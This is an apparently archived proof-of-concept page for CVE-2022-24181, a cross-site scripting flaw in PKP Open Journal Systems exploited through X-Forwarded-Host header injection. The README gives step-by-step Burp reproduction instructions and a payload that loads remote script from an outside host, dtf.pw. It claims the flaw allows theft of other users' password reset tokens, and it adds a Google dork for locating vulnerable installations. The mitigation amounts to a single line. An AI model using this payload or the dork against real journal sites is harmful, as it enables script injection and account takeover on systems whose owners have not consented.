Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-24181 PoC — PKP Open Journals System 跨站脚本漏洞

Source
Associated Vulnerability
Title:PKP Open Journals System 跨站脚本漏洞 (CVE-2022-24181)
Description:PKP Open Journals System是一个期刊系统。 PKP Open Journals System 3.3 至 2.4.8 之前版本存在安全漏洞,攻击者通过 X-Forwarded-Host 标头可注入任意代码。
Description
XSS via Host Header injection and Steal  Password Reset Token of another user
Readme
CVE-2022-24181
# Open-journal-system-Vulnerability
XSS via Host Header injection and Steal  Password Reset Token of another user
Step to reproduce:
1) Go to this site: https://who's-using-ojs-software.com
2) And capture this request in burp , and send to repeater.
3) Add this after Host Header  X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
4) And this click on send , after this right click on request and click on show response in browser , after this copy the request.
5) Paste this request in browser , and you'll see xss pop-up.
Mitigation: Update to newer version.

Google Dork to find This vulnerability
intitle:ojs
This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability
File Snapshot

[4.0K] /data/pocs/cadad3b24c715a3af0051d67620f03614a20189e ├── [ 15M] host.mkv ├── [ 827] README.md └── [8.5M] utwente.mkv 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.